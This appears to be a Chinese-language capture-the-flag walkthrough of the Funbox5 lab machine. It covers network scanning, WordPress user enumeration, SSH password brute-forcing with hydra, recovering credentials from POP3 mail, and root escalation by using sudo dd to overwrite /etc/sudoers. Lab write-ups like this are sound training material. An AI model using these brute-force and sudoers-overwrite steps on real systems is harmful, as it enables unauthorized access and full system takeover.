funbox5复现
funbox5复现
原创 LULU 红队蓝军 2024-11-29 10:01
信息收集
ip
arp-scan -l
netdiscover -i eth0 -r 192.168.56.0/24
nmap -sP 192.168.56.0/24
masscan 192.168.56.0/24 -p 80,22
端口
nmap -A -p- -T4 192.168.56.107
目录
使用dirsearch
访问robots.txt
访问/drupal,重定向到192.168.178.33
针对于http://192.168.56.107/drupal/ 再次扫描drupal下的目录
dirsearch -u http://192.168.56.107/drupal/
dirb http://192.168.56.107/drupal
网站探测
网站由WordPress,利用 wpscan 进行扫描对用户进行枚举,发现两个用户
wpscan --url http://192.168.56.107/drupal/index.php--enumerate u
根据提示–wp-content-dir制定URL
wpscan --url http://192.168.56.107/drupal/index.php --wp-content-dir=http://192.168.56.107/drupal/wp-content --enumerate u
爆破密码
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.107
登录ssh 用户名/密码 ben/pookie
ben用户属于附属组 mail (GID 8)。这在管理用户权限和访问控制时非常有用。例如,属于 mail 组的用户通常会有权限访问与邮件服务相关的资源或文件。
查看mail。提示没有权限
查看后台监听端口
netstat -anp
后台监听端口发现 110端口
端口110是POP3(邮局协议版本3)的默认端口,用于电子邮件的接收和下载。
使用telnet 连接。用 ben 用户的信息凭据登录
发现有三封邮件,403 、391、578
查看578邮件,得到用户名 / 密码 adam: qwedsayxc!
登录用户adam,附属组为sudo
sudo 提权
sudo -l
adam不需要密码就能以root的身份执行命令
通过网站GTFOBins查询提权方法
https://gtfobins.github.io/
提权方法
该命令可以写入具有root权限的文件,执行命令进行写入文件/etc/sudoers,即设置adam用户具有全部的特权命令。
/etc/sudorers文件解释
该文件允许特定用户像root用户一样使用各种各样的命令,而不需要root用户的密码。
当用户执行sudo时,系统会主动寻找/etc/sudoers文件,判断该用户是否有执行sudo的权限。
LFILE=/etc/sudoers
echo "adam ALL=(ALL:ALL) ALL " | sudo dd of=$LFILE
找到flag